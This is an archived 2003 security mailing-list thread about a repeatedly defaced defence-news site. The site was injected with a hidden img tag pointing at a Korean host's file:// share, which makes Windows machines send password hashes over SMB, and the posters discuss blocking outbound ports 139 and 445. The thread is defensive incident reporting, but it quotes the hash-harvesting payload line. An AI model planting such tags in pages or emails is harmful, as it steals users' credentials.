Hello, What happens if you're in an Active Directory/Kerberos environment? Will it revert to sending the hash for NTLM auth or will it just try to obtain a ticket for the resource? Or, am I completely barking up the wrong tree on this? :) I seem to remember that it will revert, but was wondering if anyone knew for sure. Thanks in advance. -Barry Stark, Vernon L. wrote: > A host that encounters content such as <img >src=file://korean_ip_address/test.jpg height=0 width=0> simply tries to >contact the single host korean_ip_address. It does not try to do a DDOS. If >ports 139 and 445 are not blocked outbound, the impact is that the host will >create a connection with the Korean host and attempt to authenticate. This >authentication includes providing password hashes to the remote host. > > What we've seen is a news site that repeatedly gets defaced. The >defacement consists of simply adding the content listed above. When users >are browsing the web and encounter this news site, their hosts attempt to >call Korea. The packets all have the same destination IP address (the >Korean host) and their only intent is to establish a connection with the >Korean host. There is no intent to do a DOS. So, blocking outbound TCP 139 >and 445 keeps your password hashes from being transmitted to Korea where >they might be cracked and used for gaining access to your network. The >content simply provides a way to harvest password hashes. > > By the way, I've also seen this content in an e-mail message. Yes, >when the user opened the e-mail, his host started attempting to contact the >IP address listed in the offending content. > >Vern > >-----Original Message----- >From: Jack Lyons [mailto:jack.lyonsat_private] >Sent: Tuesday, July 22, 2003 12:39 PM >To: 'Stark, Vernon L.'; 'incidentsat_private' >Subject: RE: Importance of outbound traffic filtering > > >I block those ports and others outbound, but it would only stop DDOS attack >against people who left those ports open inbound - correct? > > > >>-----Original Message----- >>From: Stark, Vernon L. [mailto:Vern.Starkat_private] >>Sent: Friday, July 18, 2003 10:13 AM >>To: 'incidentsat_private' >>Subject: Importance of outbound traffic filtering >> >> For the third time since May 5th, a site which provides news about >>department of defense issues has apparently been defaced. The hack is >>described in Ed Skoudis's excellent book entitled "Counter Hack" (pages >>289-290). The hack we noticed today is a web page with content of the >>form >> >><img src=file://korean_ip_address/test.jpg height=0 width=0> >> >> If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows >>hosts will attempt to send password hashes to the remote host. Hosts may >>attempt to contact the remote host on other ports (e.g. 80) as well. This >>clearly illustrates the importance of outbound traffic filtering. >> >>Vern Stark, GCIA, GSEC >> >>JHU/APL >> >>-------------------------------------------------------------------------- >>-- >>Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the >>world's premier technical IT security event! 10 tracks, 15 training >>sessions, >>1,800 delegates from 30 nations including all of the top experts, from >>CSO's to >>"underground" security specialists. See for yourself what the buzz is >>about! >>Early-bird registration ends July 3. This event will sell out. >>www.blackhat.com >>-------------------------------------------------------------------------- >>-- >> >> > > >This email and its contents may be confidential. If it is and you are not >the intended recipient, please do not disclose or use the information within >this email or its attachments. If you have received this email in error, >please delete it immediately. Thank you. > > >--------------------------------------------------------------------------- >---------------------------------------------------------------------------- > > > > > --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Thu Jul 31 2003 - 07:45:38 PDT